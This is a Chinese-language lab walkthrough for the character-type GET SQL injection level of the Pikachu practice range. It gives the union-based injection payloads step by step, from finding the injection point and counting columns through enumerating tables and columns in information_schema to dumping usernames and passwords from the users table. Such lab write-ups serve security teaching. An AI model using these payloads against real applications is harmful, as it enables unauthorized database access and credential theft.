Pikachu靶场-SQL注入-字符型注入(get)过关步骤
2023-02-18 16:36:44 时间
Pikachu靶场-SQL注入-字符型注入(get)过关步骤
这关的名字就可以看出,这关参数是字符串,提交方式是get提交,也就是说直接在浏览器地址栏里输入注入语句即可
判断是否存在注入点
这里输入要查询的用户名称,不知道用户名称都有什么,可以在数字型注入中查询一个,URL地址栏里的传参就两个 name= 和 submit ,submit 应该是提交自带的不用管它,但注入时不要删除掉,那么name这个参数就是注入点了
这关的闭合是点引号,然后 and -1=-1 和 and -1=-12
判断注入点具体操作看动图:
判断有多少个字段数
使用 order by 判断字段数,这关的字段数是 2具体操作看动图:
展示显错位
知道了字段数,那么接下来就用union select 11,22 -- bbq
展示显错位了具体看动图:
查询当前数据库
version()查看数据库版本 ,database()查看当前数据库
union select version() ,database() -- bbq
操作看动图:
查询出数据库中的所有表
使用 union select table_name,22 from information_schema.tables where table_schema=database() -- bbq
得到当前数据库所有表名,具体看动图:
查询指定的表中的列名
查询出表名下一步就是,查询字段也就是列名称使用 union select column_name,22 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq
语句查询,具体看动图:
查询数据
当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了
union select username,password from users -- bbq
具体看动图:
相关文章
- 恕我直言你可能真的不会java第7篇:像使用SQL一样排序集合
- 【架构师(第三十七篇)】 服务端开发之后端框架与数据库技术选型
- 【架构师(第三十八篇)】 服务端开发之本地安装最新版 MySQL 数据库
- 【架构师(第三十九篇)】 服务端开发之连接 MySQL 数据库
- 【架构师(第四十一篇)】 服务端开发之安装并连接 Redis数据库
- MySQL的date_format()和str_to_date()
- mysql查询语句left join和right join问题(日常工作遇到问题总结-仅供个人学习)
- Mac安装Navicat for MySQL(数据库管理工具)教程支持M2M1
- 【MySQL】深入分析 锁机制(一)行锁 加锁规则 之 等值查询
- MYSQL数据库-索引
- MYSQL数据库-复合查询
- MYSQL数据库-内外连接
- [android] 安卓消息推送的几种实现方式
- [android] 安卓进程优先级&为什么使用服务
- MySQL 日志之 binlog 格式 → 关于 MySQL 默认隔离级别的探讨
- [android] 安卓自定义样式和主题
- [javaEE] 开源数据库连接池
- [javaEE] 数据库连接池和动态代理
- [android] 安卓消息推送的几种实现方式
- [android] 安卓进程优先级&为什么使用服务